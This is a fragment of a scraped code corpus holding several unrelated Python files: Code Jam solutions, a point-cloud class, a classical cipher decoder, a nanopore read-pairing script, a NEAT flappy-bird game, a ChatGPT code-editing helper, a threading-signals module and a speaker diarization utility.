Done!')\r\n","repo_name":"nlceyes/TianChi-JinNan","sub_path":"Run-Pre.py","file_name":"Run-Pre.py","file_ext":"py","file_size_in_byte":7840,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"23396325071","text":"import math\r\ndef fs(a,b):\r\n global summ\r\n summ = 0\r\n for j in range(a,b+1):\r\n if (str(j))[::-1] == str(j):\r\n if math.sqrt(j) % 1 == 0:\r\n x = str(int(math.sqrt(j)))\r\n if x[::-1] ==str(str(int(math.sqrt(j)))):\r\n summ = summ + 1\r\n return (summ)\r\n\r\ninfile = open(\"C-small-attempt0.IN\", 'r')\r\noutfile = open(\"C-small\",'w')\r\nlines = infile.readlines()\r\nnum = []\r\n\r\ni = 1\r\nfor line in lines:\r\n if i != len(lines):\r\n num.append(line[:-1])\r\n i += 1\r\n else:\r\n num.append(line)\r\n\r\nnum.pop(0)\r\nspace = []\r\nfor i in num:\r\n posn = 0\r\n for j in i:\r\n if j == ' ':\r\n space.append(posn)\r\n break\r\n else:\r\n posn += 1\r\n\r\n#print(num)\r\n\r\nposition = 0\r\nfor i in num:\r\n x = space[position]\r\n a = int(i[0:x])\r\n b = int(i[x:])\r\n fs(a,b)\r\n position += 1\r\n outfile.write(\"Case #\" + str(position) + \": \"+ str(summ) + '\\n')\r\n\r\n\r\n\r\n\r\ninfile.close()\r\noutfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2976.py","file_name":"2976.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23610882161","text":"class MyWire:\r\n\tdef __init__(self, a, b):\r\n\t\tself.a = a\r\n\t\tself.b = b\r\n\r\n\tdef getA(self):\r\n\t\treturn self.a\r\n\r\n\tdef getB(self):\r\n\t\treturn self.b\r\n\r\n\r\ndef getIntersectionCnt(wireCnt, wires):\r\n\twires.sort(key=lambda k: k.getA())\r\n\tcnt = 0\r\n\tfor i in range(wireCnt):\r\n\t\twire1 = wires[i]\r\n\t\tfor j in range(i+1, wireCnt):\r\n\t\t\twire2 = wires[j]\r\n\t\t\tif wire1.getB() > wire2.getB():\r\n\t\t\t\tcnt = cnt + 1\r\n\treturn cnt\r\n\r\n\r\nimport sys\r\n\r\nfileNamePrefix = sys.argv[1]\r\nfileNameIn = fileNamePrefix + \".in\"\r\nfileNameOut = fileNamePrefix + \".out\"\r\n\r\nfileIn = open(fileNameIn, 'r')\r\nlines = fileIn.readlines()\r\n\r\ntestcnt = int(lines[0])\r\nidx = 1\r\n\r\nfileOut = open(fileNameOut, 'w')\r\n\r\nfor test in range(testcnt):\r\n\tline = lines[idx].split(' ')\r\n\tidx += 1\r\n\twireCnt = int(line[0])\r\n\r\n\twires = []\r\n\tfor i in range(wireCnt):\r\n\t\tline = lines[idx].split(' ')\r\n\t\tidx += 1\r\n\t\twires.append( MyWire( int(line[0]), int(line[1]) ) )\r\n\r\n\tres = getIntersectionCnt(wireCnt, wires)\r\n\r\n\tfileOut.write(\"Case #{0}: {1}\\n\".format(test + 1, res))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_62/92.py","file_name":"92.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14671468658","text":"import torch\nfrom torch_scatter import scatter_mean\nimport logging\n\nfrom .base_cloud import Cloud\n\nlog = logging.getLogger(__name__)\n\n\nclass SuperpointCloud(Cloud):\n def __init__(self, path: str, size: int, cloud_id: int,\n superpoint_map: torch.Tensor,\n diversity_aware: bool, labels: torch.Tensor,\n surface_variation: torch.Tensor,\n color_discontinuity: torch.Tensor = None):\n super().__init__(path, size, cloud_id, diversity_aware, labels,\n surface_variation, color_discontinuity)\n self.superpoint_map = superpoint_map\n\n self.values = None\n self.features = None\n self.ids = torch.full((self.num_superpoints,), self.id, dtype=torch.long)\n self.superpoint_indices, self.superpoint_sizes = torch.unique(self.superpoint_map, return_counts=True)\n\n @property\n def num_superpoints(self) -> int:\n return self.superpoint_map.max().item() + 1\n\n @property\n def superpoint_labels(self) -> torch.Tensor:\n label_mean = scatter_mean(self.labels.float(), self.superpoint_map, dim=0)\n return torch.round(label_mean).long()\n\n def _save_metric(self, values: torch.Tensor, features: torch.Tensor = None) -> None:\n self.values = scatter_mean(values, self.superpoint_map, dim=0)\n if features is not None:\n self.features = scatter_mean(features, self.superpoint_map, dim=0)\n\n def __str__(self):\n ret = f'\\nSuperpointCloud:\\n' \\\n f'\\t - Cloud ID = {self.id}, \\n' \\\n f'\\t - Cloud path = {self.path}, \\n' \\\n f'\\t - Number of voxels in cloud = {self.size}\\n' \\\n f'\\t - Number of superpoints in cloud = {self.num_superpoints}\\n' \\\n f'\\t - Number of model predictions = {self.predictions.shape[0]}\\n'\n if self.num_classes > 0:\n ret += f'\\t - Number of semantic classes = {self.num_classes}\\n'\n ret += f'\\t - Percentage labeled = {torch.sum(self.label_mask) / self.size * 100:.2f}%\\n'\n return ret\n","repo_name":"aleskucera/MuVAL","sub_path":"src/selection/superpoint_cloud.py","file_name":"superpoint_cloud.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23561318911","text":"def update(A,j):\r\n for i in range(len(A)-1,j-1,-1):\r\n A[i] = 9;\r\n A[j-1] = A[j-1] - 1;\r\n return A;\r\n\r\ndef magic(numList):\r\n s = ''.join(map(str, numList))\r\n return int(s)\r\n\r\ninput_f = open('B-small-attempt0.in' , 'r');\r\noutput_f = open('B_output.txt' , 'w');\r\nT = int(float(input_f.readline()));\r\n\r\nfor i in range(1,T+1):\r\n num = int(float(input_f.readline()));\r\n check = 0;\r\n A = [int(x) for x in str(num)];\r\n for j in range(len(A)-1,0,-1):\r\n if A[j] < A[j-1]:\r\n A = update(A,j);\r\n \r\n tidy = magic(A);\r\n out = 'Case #' + str(i) + ': ' + str(tidy) + '\\n';\r\n output_f.write(out);\r\n \r\n \r\noutput_f.close();\r\ninput_f.close();\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4350.py","file_name":"4350.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27163105109","text":"#!/usr/bin/python3\n\n#text = 'sg kof swbaoz gqvcsbs uswgvo boasbg robw' #bsp fuer rot verschiebung\n#text='aa ab ac ad ae ba bb bc bd be ca cb cc cd ce da db dc dd de ea eb ec ed ee' #bsp fuer square (polybius)\n#text='1424154315422531114244155344244344241544554455455115424313233145154343153133' #bsp fuer caesarquadrat\n#text='twwnp zoaas wnuhz bnwwg snbvc slypm m' #bsp fuer vigener, pw HOUGHTON\ntext='kt tz zk wb xl ow ov kz kd lo po ur n' # BSP fuer playfair\n\n\n#TODO fix that it is only working for no capital letters\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\nalphabet_25 = 'abcdefghiklmnopqrstuvwxyz'\n\n#split abc \nalphabet_25_split=[alphabet_25[i:i+1] for i in range(0,len(alphabet_25),1)]\n\nkeywords_ger=['die','der','das','und','in', 'zu', 'ich', 'hab', 'werd', 'sie', 'von', 'mit'] \nkeywords_en=['the','be','to', 'of', 'and', 'in', 'that', 'have', 'it', 'for'] \n\n#set language for spell checker\nkeywords=keywords_ger\n\n#-----ROT-Verschiebung------------------------------------------------\n\ndef rot_verschiebung(text):\n text_split=text.split()\n\n succes=0\n words=len(text_split)\n\n print(' ROT-Verschiebung:')\n for move in range(0,26):\n decoded=\"\"\n for word in range(0,words):\n new_text= ''.join((chr(97+(ord(letter)-97+move)%26) for letter in text_split[word]))\n decoded= decoded + ' ' + new_text\n #check for most common keywords\n for key in range (0,len(keywords)):\n if keywords[key] in decoded:\n print(move,'match with', keywords[key], ': ', decoded)\n succes=1\n if succes==0:\n print('no match with keywords')\n # print (move, ':', decoded)\n\n#--------------------------------------------------------------------\n\n\n#---square chiffre--------------------------------------------\n\ndef square_chiffre(text,pw1,pw2):\n\n print('\\n Polybios chiffre (square)')\n\n matrix=''\n decrypt=''\n succes=0\n text_strip=text.replace(\" \",\"\") #get rid off spaces\n words=len(text_strip)\n \n #Password and text split\n pw1_split=[pw1[i:i+1] for i in range(0, 5, 1)]\n pw2_split=[pw2[i:i+1] for i in range(0, 5, 1)]\n text_split=[text_strip[i:i+2] for i in range(0, len(text_strip), 2)]\n\n #Matrix aufstellen\n for i in range(0,len(pw1)):\n for j in range(0,len(pw2)):\n matrix+=pw1_split[i] + pw2_split[j]\n \n matrix_split=[matrix[i:i+2] for i in range (0,len(matrix), 2)]\n\n #decrypting\n for i in range(0,len(text_split)):\n for j in range(0,len(matrix_split)):\n if text_split[i]==matrix_split[j]:\n decrypt+=alphabet_25_split[j]\n #check for most common keywords\n for key in range (0,len(keywords)):\n if keywords[key] in decrypt:\n print('match with', keywords[key], ': ', decrypt)\n succes=1\n if succes==0:\n print('no match with keywords')\n#-------------------------------------------------------------\n\n#--Vigenere chiffre-------------------------------------------\n\ndef vigenere(text,pw):\n print('\\nVigenere cipher')\n decode=''\n text_strip=text.replace(\" \",\"\") #get rid off spaces\n pw_split=[pw[i:i+1] for i in range(0, len(pw), 1)]\n text_split=[text_strip[i:i+1] for i in range(0, len(text), 1)]\n \n for letter in range(0,len(text_strip)):\n i= letter%len(pw)\n shift=alphabet.index(text_split[letter])- alphabet.index(pw_split[i])\n if shift < 0:\n shift+=26\n decode+=alphabet[shift]\n print('Decoded with password',pw,':',decode)\n#-------------------------------------------------------------\n\n\n#-Playfair Cypher --------------------------------------------\n\ndef playfair(text, key):\n print('\\nPlayfair cipher')\n temp=[]\n new_key=[]\n decrypt=[]\n decode=''\n add_letter=0\n\n text_strip=text.replace(\" \",\"\") #get rid off spaces\n\n #get an even amount of letters and split them into pairs\n if len(text_strip)%2==1:\n text_strip=text_strip+'a'\n add_letter=1\n text_split=[text_strip[i:i+1] for i in range(0, len(text_strip), 1)]\n\n #for i in range(0,len(text_split)-1):\n # if text_split[2*i+1]==text_split[2*i]: #TODO find a rule for the exception of double letters\n \n \n #split key and remove double letters\n key_split=[key[i:i+1] for i in range(0,len(key), 1)] \n for i in range (0,len(key_split)): \n if key_split[i] not in temp:\n new_key[len(new_key):]=key_split[i]\n temp[len(temp):]=key_split[i]\n\n #reduce alphabet by key letters and add key in front\n for i in range(0, len(new_key)):\n alphabet_25_split.remove(new_key[i])\n new_key+=alphabet_25_split\n\n #check which of the three cases applies for the letter pairs if key would be aligned in a 5x5 matrix\n #1) in one column 2) in one row 3) not at all correlated\n for i in range(0,len(text_split), 2):\n pos1= new_key.index(text_split[i])\n pos2= new_key.index(text_split[i+1])\n\n if pos1%5==pos2%5: #criteria for columns\n if pos1>=5:\n pos1-=5\n else:\n pos1+=20\n if pos2>=5:\n pos2-=5\n else: \n pos2+=20\n decrypt.append(new_key[pos1])\n decrypt.append(new_key[pos2])\n \n elif abs(pos1-pos2)<4: #criteria for rows\n if pos1%5==0:\n pos1+=4\n else:\n pos1-=1\n if pos2%5==0:\n pos2+=4\n else:\n pos2-=1\n decrypt.append(new_key[pos1])\n decrypt.append(new_key[pos2])\n\n else: #everything else\n temp1=pos1//5*5+pos2%5\n temp2=pos2//5*5+pos1%5\n decrypt.append(new_key[temp1])\n decrypt.append(new_key[temp2])\n \n #remove additional letter again and align the decrypted list to a string\n if add_letter==1:\n decrypt.pop()\n for i in range(0,len(decrypt)):\n decode+=decrypt[i]\n print('Decoded with password',key,':',decode)\n#-------------------------------------------------------------\n\n#TODO add if clauses to neglect unimportant chiffre (eg rot shift for numbers etc)\n\n\nrot_verschiebung(text)\nsquare_chiffre(text,'12345','12345')\nvigenere(text,'houghton')\nplayfair(text,'butzelbaer')\n","repo_name":"PaulMatthias/Projects","sub_path":"codebreaker.py","file_name":"codebreaker.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33341760798","text":"\"\"\"Pair reads.\n\nConvenience wrapper to both form pairs (pairs_from_summary) and filter them\n(filter_pairs).\n\"\"\"\n\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\n\nimport pysam\n\nimport duplex_tools\nfrom duplex_tools.filter_pairs import add_args as add_filter_args\nfrom duplex_tools.filter_pairs import filter_candidate_pairs_by_aligning\nfrom duplex_tools.pairs_from_summary import add_args as add_pair_args\nfrom duplex_tools.pairs_from_summary import find_pairs\n\n\ndef pair_and_align(input_bam,\n max_time_between_reads,\n max_seqlen_diff,\n max_abs_seqlen_diff,\n min_qscore,\n bases_to_align,\n min_length,\n max_length,\n output_dir,\n align_threshold,\n no_end_penalties,\n penalty_open,\n penalty_extend,\n score_match,\n score_mismatch,\n threads,\n **kwargs):\n \"\"\"Pair and align reads from an unmapped bam.\n\n :param input_bam: The input bam file (containing unmapped reads)\n :param output_dir: The output directory (the pair_ids_filtered.txt is here)\n :param max_time_between_reads: see pairs_from_summary\n :param max_seqlen_diff: see pairs_from_summary\n :param max_abs_seqlen_diff: see pairs_from_summary\n :param min_qscore: see pairs_from_summary\n :param bases_to_align: see filter_pairs\n :param min_length: see filter_pairs\n :param max_length: see filter_pairs\n \"\"\"\n logger = duplex_tools.get_named_logger(\"Pair\")\n find_pairs(input_bam,\n outdir=output_dir,\n max_time_between_reads=max_time_between_reads,\n max_seqlen_diff=max_seqlen_diff,\n max_abs_seqlen_diff=max_abs_seqlen_diff,\n min_qscore=min_qscore,\n )\n filter_candidate_pairs_by_aligning(f'{output_dir}/pair_ids.txt',\n reads_path=input_bam,\n bases_to_align=bases_to_align,\n min_length=min_length,\n max_length=max_length,\n align_threshold=align_threshold,\n no_end_penalties=no_end_penalties,\n penalty_open=penalty_open,\n penalty_extend=penalty_extend,\n score_match=score_match,\n score_mismatch=score_mismatch,\n threads=threads\n )\n\n npairs = sum(1 for _ in open(f'{output_dir}/pair_ids_filtered.txt'))\n nreads = pysam.AlignmentFile(input_bam, check_sq=False).count(\n until_eof=True)\n logger.info(f'Initial reads: {nreads}')\n logger.info(f'Created pairs: {npairs}')\n logger.info(f'Paired reads: {2 * npairs}')\n logger.info(f'Approximate duplex rate for {input_bam}: '\n f'{2*100*npairs / nreads:.2f}%')\n\n\ndef argparser():\n \"\"\"Create argument parser.\"\"\"\n parser = ArgumentParser(\n \"Filter candidate read pairs by basecall alignment.\",\n formatter_class=ArgumentDefaultsHelpFormatter,\n parents=[duplex_tools._log_level()],\n add_help=False)\n parser.add_argument(\n \"bam\",\n help=\"A bam file from dorado.\")\n parser.add_argument(\n \"--output_dir\",\n help=\"The output directory\", default='pairs_from_bam')\n\n parser = add_pair_args(parser)\n parser = add_filter_args(parser)\n\n return parser\n\n\ndef main(args):\n \"\"\"Entry point.\"\"\"\n pair_and_align(input_bam=args.bam,\n output_dir=args.output_dir,\n max_time_between_reads=args.max_time_between_reads,\n max_seqlen_diff=args.max_seqlen_diff,\n max_abs_seqlen_diff=args.max_abs_seqlen_diff,\n min_qscore=args.min_qscore,\n bases_to_align=args.bases_to_align,\n min_length=args.min_length,\n max_length=args.max_length,\n no_end_penalties=args.no_end_penalties,\n align_threshold=args.align_threshold,\n penalty_open=args.penalty_open,\n penalty_extend=args.penalty_extend,\n score_match=args.score_match,\n score_mismatch=args.score_mismatch,\n threads=args.threads,\n )\n","repo_name":"nanoporetech/duplex-tools","sub_path":"duplex_tools/pair.py","file_name":"pair.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"61"} +{"seq_id":"8420255665","text":"import pygame\nfrom hiddenAI.sequential import * \nfrom hiddenAI.neat import NEAT\nfrom hiddenAI.optimizers import * \nfrom hiddenAI.layers.main_layers import *\nfrom hiddenAI.layers.activations import *\nimport random\n\nWIDTH = 800\nHEIGHT= 700\nSCREEN = pygame.display.set_mode((WIDTH,HEIGHT))\nclass Pillar:\n\tdef __init__(self,xvalue,opening_start):\n\t\tOPENINGHEIGHT = 200\n\t\tself.xvalue = xvalue\n\t\tself.opening_start = opening_start\n\t\tself.opening_end = opening_start+OPENINGHEIGHT\n\t\tself.delete = False\n\n\tdef draw(self,bird_position_x):\n\t\tif (-100<=self.xvalue-bird_position_x<=WIDTH):#-100 is the width of a pillar\n\t\t\tpass\n\t\telif self.xvalue-bird_position_x<-100:\n\t\t\tself.delete = True\n\t\t\treturn\n\t\telse:\n\t\t\treturn\n\t\tpygame.draw.rect(SCREEN,(255,255,255),pygame.Rect(self.xvalue-bird_position_x,0,100,self.opening_start))\n\t\tpygame.draw.rect(SCREEN,(255,255,255),pygame.Rect(self.xvalue-bird_position_x,self.opening_end,100,HEIGHT-self.opening_end))\n\n\tdef detect_collision(self,bird_position,bird_size = 10):\n\t\tscreen_x = self.xvalue - bird_position[0]\n\t\tbird_screen_position = (200,bird_position[1])\n\t\tif screen_x-bird_size <= bird_screen_position[0]<= screen_x+bird_size+100:#100 is the width of a pillar\n\t\t\treturn bird_position[1] + bird_size> self.opening_end or bird_position[1] - bird_size < self.opening_start\nclass Bird:\n\tdef __init__(self):\n\t\tself.yvalue = HEIGHT/2\n\t\tself.velocity = 0\n\t\tself.score = 0\n\t\tself.alive = True\n\t\tself.can_flap = 0\t\n\n\tdef tick(self,dt,flap = False):\n\t\tif self.alive:\n\t\t\tself.score += dt\n\t\tself.yvalue += self.velocity * dt\n\t\tif self.yvalue < 0 or self.yvalue > HEIGHT:\n\t\t\tself.alive = False\n\t\tself.draw()\n\t\tif flap and self.can_flap <= 0:\n\t\t\tself.flap()\n\t\t\tself.can_flap = 1/10\n\t\t\treturn\n\t\tself.can_flap -= dt\n\t\tself.velocity += 750 * dt #gravity is 10 pixels per seconds^2\n\n\tdef draw(self,bird_size = 10,x_center = 200):\n\t\tpygame.draw.rect(SCREEN,(125,0,125),pygame.Rect(x_center-bird_size,self.yvalue-bird_size,bird_size*2,bird_size*2))\n\n\tdef flap(self):\n\t\tself.velocity = -300\n\t\n\nnum_pillars = 10000\nnum_birds = 50\nmodel = Sequential(7,FullyConnected(3),Bias(),Sigmoid(),FullyConnected(2),Bias(),Sigmoid(),optimizer = None) \nneat = NEAT(model,num_per_generation = num_birds)\nall_bird_nets = [Sequential(7,FullyConnected(3),Bias(),Sigmoid(),FullyConnected(2),Bias(),Sigmoid(),optimizer = None) for _ in range(num_birds)] \nall_real_birds = [Bird() for _ in range(num_birds)]\nrunning = True\nclock = pygame.time.Clock()\ngen_num=0\nworld_x = 0\nwhile running:\n\tpillars = [Pillar(750*x + 1000,random.randint(0,HEIGHT-200)) for x in range(num_pillars)]#pillars are spaced 500 apart,and the first is 1000 away from the bird\n\tprint(\"GENERATION\",neat.generation,\"WORLD SCORE:\",world_x,\"MAX SCORE\",max([bird.score for bird in all_real_birds]))\n\tworld_x = 0\n\tgen_running = True\n\tall_bird_nets = neat.new_generation(all_bird_nets,[bird.score for bird in all_real_birds],mutation_max_size = 5)\n\tall_real_birds = [Bird() for _ in range(num_birds)]\n\tworld_score = 0\n\twhile gen_running:\n\t\tSCREEN.fill((0,0,0))\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trunning = False\n\t\t\t\tgen_running = False\n\t\t\t\tbreak\n\t\tdead_pillars = []\n\t\tfor pillar_num,pillar in enumerate(pillars):\n\t\t\tpillar.draw(world_x)\n\t\t\tif pillar.delete:\n\t\t\t\tdead_pillars.append(pillar_num)\n\t\tfor pillar_num in dead_pillars:\n\t\t\tdel pillars[pillar_num]\n\t\tfirst_pillar = pillars[0] \n\t\tdt = clock.tick(24)/1000\n\t\tworld_x += dt* 250\n\t\talive = 0\n\t\tfor bird_num,bird_net in enumerate(all_bird_nets):\n\t\t\treal_bird = all_real_birds[bird_num]\n\t\t\tif not real_bird.alive:\n\t\t\t\tcontinue\n\t\t\treal_bird.score = world_x\n\t\t\treal_bird.draw()\n\t\t\tif first_pillar.detect_collision((world_x,real_bird.yvalue)):\n\t\t\t\treal_bird.alive = False\n\t\t\t\tcontinue\n\t\t\talive += 1\n\t\t\t\n\t\t\tresult = bird_net.run(np.array([real_bird.yvalue/HEIGHT,1-real_bird.yvalue/HEIGHT,real_bird.velocity/100,(first_pillar.opening_start)/HEIGHT,1-(first_pillar.opening_start)/HEIGHT,(first_pillar.xvalue-world_x)/1000,real_bird.can_flap]))\n\t\t\treal_bird.tick(dt,result[0]>result[1])\n\t\tif alive ==0:\n\t\t\tgen_running = False\n\t\tpygame.display.flip()\t\t\t\nneat.save_model_to_file(\"stored_weights/flappy_bird\")\t\n","repo_name":"enigmurl/hiddenAI","sub_path":"flappybird.py","file_name":"flappybird.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14863844008","text":"import constants\nimport prompts\nimport java\nimport os\nimport sys\nimport openai\nimport json\nimport requests\nimport os.path\n\n# Obtain main file path\nPATH = os.getcwd()\n\n# ChatGPT API Key Setup\nkey = constants.API_KEY_CHATGPT\nopenai.api_key = key\n\n# Testing if user input argument to represent source file\n# Production of source file name, basename, and extension\n# Else exit the program\nif len(sys.argv) > 1:\n file_name = sys.argv[1]\n file_basename, file_extension = os.path.splitext(file_name)\nelse:\n print('No file provided. Run again with file name as argument.')\n exit()\n\n# Checking if there is already an output file that matches source file\n# If so, using subsequent prompt design vs. intiial prompt design.\n# Also reads the output file in full to send to GPT.\nif os.path.isfile(PATH + '\\\\output\\\\{file_name}'):\n request = prompts.sub_prompt(file_extension, file_name)\n os.chdir(PATH + '\\\\output')\n with open(file_name, 'r') as file:\n lines = file.readlines()\nelse:\n request = prompts.initial_prompt(file_extension, file_name)\n\n# Read the source file to send to GPT. This could be in tandem with\n# output file in order to use same format as last execution.\nos.chdir(PATH + '\\\\source')\nwith open(file_name, 'r') as file:\n lines = file.readlines()\n\ninputfile=\"\\n\".join(lines)\n\n# Submission of message to GPT model\nresponse=openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": request},\n {\"role\": \"user\", \"content\": inputfile}\n ]\n)\n\n# Receipt and formatting of return response\nfilecontents=response['choices'][0][\"message\"][\"content\"]\nfilecontents=filecontents.replace('\\n\\n', '\\n')\n\n# Writing the new output file based on GPT's modified source code\nos.chdir(PATH + '\\\\output')\noutput_path = os.getcwd()\nf = open(file_name, 'w+')\nf.write(filecontents)\nf.close()\n\n# Compile and run edited output file\njava.compile_java(output_path, file_name)\njava.execute_java(output_path, file_basename)","repo_name":"jstandfast/GPTracer","sub_path":"codetracer.py","file_name":"codetracer.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5433333595","text":"\"\"\" All the threading.Event settings. \"\"\"\nfrom threading import Event\n\n\nclass SignalThreadStarted(Event):\n \"\"\" A thread has successfully started. \"\"\"\n\nclass SignalThreadStopped(Event):\n \"\"\" A thread has successfully stopped. \"\"\"\n\nclass SignalThreadsAreStarted(Event):\n \"\"\" All the threads have started. \"\"\"\n\nclass SignalExit(Event):\n \"\"\" Some event demands to stop the program. \"\"\"\n\nclass SignalAllDone(Event):\n \"\"\" main.py signaling just before the exit for the testing purposes. \"\"\"\n\nclass SignalIncomingMessage(Event):\n \"\"\" A new message in the receiver message queue (rmq). \"\"\"\n\nclass SignalMessageToSend(Event):\n \"\"\" A new message to telegram in the sender message queue (smq). \"\"\"\n\nclass SignalUpdater(Event):\n \"\"\" A new updater cycle. \"\"\"\n\n\n# Threading signals\nSENDER_IS_RUNNING = SignalThreadStarted()\nUPDATER_IS_RUNNING = SignalThreadStarted()\nCONTROLLER_IS_RUNNING = SignalThreadStarted()\nRECEIVER_IS_RUNNING = SignalThreadStarted()\n\nSENDER_IS_STOPPED = SignalThreadStopped()\nUPDATER_IS_STOPPED = SignalThreadStopped()\nCONTROLLER_IS_STOPPED = SignalThreadStopped()\nRECEIVER_IS_STOPPED = SignalThreadStopped()\n\nALL_THREADS_ARE_GO = SignalThreadsAreStarted()\n\n\n# Other\nINCOMING_MESSAGE = SignalIncomingMessage()\nNEW_MESSAGE_TO_SEND = SignalMessageToSend()\nUPDATER_CYCLE = SignalUpdater()\n\nEXIT_SIGNAL = SignalExit()\n\nALL_DONE_SIGNAL = SignalAllDone()\n\n\ndef exit_signal(signal_=None, frame=None):\n \"\"\" System SIGINT and SIGTSTP. \"\"\"\n print()\n EXIT_SIGNAL.set()\n","repo_name":"voronokKita/LuckyBot","sub_path":"lucky_bot/helpers/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28793998377","text":"import json\nimport logging\nfrom pathlib import Path\n\nfrom nemo.collections.asr.models.msdd_models import ClusteringDiarizer\nfrom omegaconf import OmegaConf\nimport whisperx\n\nfrom Configs import CACHE_DIRECTORY\n\nlogging.getLogger('nemo_logger').setLevel(logging.ERROR)\n\ndef get_words_speaker_mapping(wrd_ts, spk_ts, word_anchor_option=\"start\"):\n def get_word_ts_anchor(s, e, option=\"start\"):\n if option == \"end\":\n return e\n elif option == \"mid\":\n return (s + e) / 2\n return s\n\n s, e, sp = spk_ts[0]\n wrd_pos, turn_idx = 0, 0\n wrd_spk_mapping = []\n for wrd_dict in wrd_ts:\n ws, we, wrd = (int(wrd_dict[\"start\"] * 1000), int(wrd_dict[\"end\"] * 1000), wrd_dict[\"text\"],)\n wrd_pos = get_word_ts_anchor(ws, we, word_anchor_option)\n while wrd_pos > float(e) and (turn_idx != len(spk_ts) - 1):\n turn_idx += 1\n turn_idx = min(turn_idx, len(spk_ts) - 1)\n s, e, sp = spk_ts[turn_idx]\n result = {\"word\": wrd, \"start_time\": ws, \"end_time\": we, \"speaker\": sp}\n wrd_spk_mapping.append(result)\n return wrd_spk_mapping\n\n\ndef get_realigned_ws_mapping_with_punctuation(word_speaker_mapping, max_words_in_sentence=50):\n\n sentence_ending_punctuations = \".?!\"\n\n def get_first_word_idx_of_sentence(word_idx, word_list, speaker_list, max_words):\n is_word_sentence_end = (lambda x: x >= 0 and word_list[x][-1] in sentence_ending_punctuations)\n left_idx = word_idx\n while (\n left_idx > 0\n and word_idx - left_idx < max_words\n and speaker_list[left_idx - 1] == speaker_list[left_idx]\n and not is_word_sentence_end(left_idx - 1)\n ):\n left_idx -= 1\n\n return left_idx if left_idx == 0 or is_word_sentence_end(left_idx - 1) else -1\n\n def get_last_word_idx_of_sentence(word_idx, word_list, max_words):\n is_word_sentence_end = (lambda x: x >= 0 and word_list[x][-1] in sentence_ending_punctuations)\n right_idx = word_idx\n while (\n right_idx < len(word_list)\n and right_idx - word_idx < max_words\n and not is_word_sentence_end(right_idx)\n ):\n right_idx += 1\n\n return (\n right_idx\n if right_idx == len(word_list) - 1 or is_word_sentence_end(right_idx)\n else -1\n )\n\n is_word_sentence_end = (\n lambda x: x >= 0\n and word_speaker_mapping[x][\"word\"][-1] in sentence_ending_punctuations\n )\n wsp_len = len(word_speaker_mapping)\n\n words_list, speaker_list = [], []\n for k, line_dict in enumerate(word_speaker_mapping):\n word, speaker = line_dict[\"word\"], line_dict[\"speaker\"]\n words_list.append(word)\n speaker_list.append(speaker)\n\n k = 0\n while k < len(word_speaker_mapping):\n line_dict = word_speaker_mapping[k]\n if (\n k < wsp_len - 1\n and speaker_list[k] != speaker_list[k + 1]\n and not is_word_sentence_end(k)\n ):\n left_idx = get_first_word_idx_of_sentence(k, words_list, speaker_list, max_words_in_sentence)\n right_idx = (get_last_word_idx_of_sentence(k, words_list, max_words_in_sentence - k + left_idx - 1) if left_idx > -1 else -1)\n if min(left_idx, right_idx) == -1:\n k += 1\n continue\n\n spk_labels = speaker_list[left_idx : right_idx + 1]\n mod_speaker = max(set(spk_labels), key=spk_labels.count)\n if spk_labels.count(mod_speaker) < len(spk_labels) // 2:\n k += 1\n continue\n\n speaker_list[left_idx : right_idx + 1] = [mod_speaker] * (right_idx - left_idx + 1)\n k = right_idx\n\n k += 1\n\n k, realigned_list = 0, []\n while k < len(word_speaker_mapping):\n line_dict = word_speaker_mapping[k].copy()\n line_dict[\"speaker\"] = speaker_list[k]\n realigned_list.append(line_dict)\n k += 1\n\n return realigned_list\n\n\ndef get_sentences_speaker_mapping(word_speaker_mapping, spk_ts):\n s, e, spk = spk_ts[0]\n prev_spk = spk\n\n snts = []\n snt = {\"speaker\": f\"Speaker {spk}\", \"start_time\": s, \"end_time\": e, \"text\": \"\"}\n\n for wrd_dict in word_speaker_mapping:\n wrd, spk = wrd_dict[\"word\"], wrd_dict[\"speaker\"]\n s, e = wrd_dict[\"start_time\"], wrd_dict[\"end_time\"]\n if spk != prev_spk:\n snts.append(snt)\n snt = {\n \"speaker\": f\"Speaker {spk}\",\n \"start_time\": s,\n \"end_time\": e,\n \"text\": \"\",\n }\n else:\n snt[\"end_time\"] = e\n snt[\"text\"] += wrd + \" \"\n prev_spk = spk\n\n snts.append(snt)\n return snts\n\n\ndef get_speaker_aware_transcript(sentences_speaker_mapping):\n speaker_aware_transcript = \"\"\n for sentence_dict in sentences_speaker_mapping:\n sp = sentence_dict[\"speaker\"]\n text = sentence_dict[\"text\"].lower()\n speaker_aware_transcript = speaker_aware_transcript + (f\"{sp}: {text} \")\n return speaker_aware_transcript\n\n\nclass Diarizer:\n \n \n 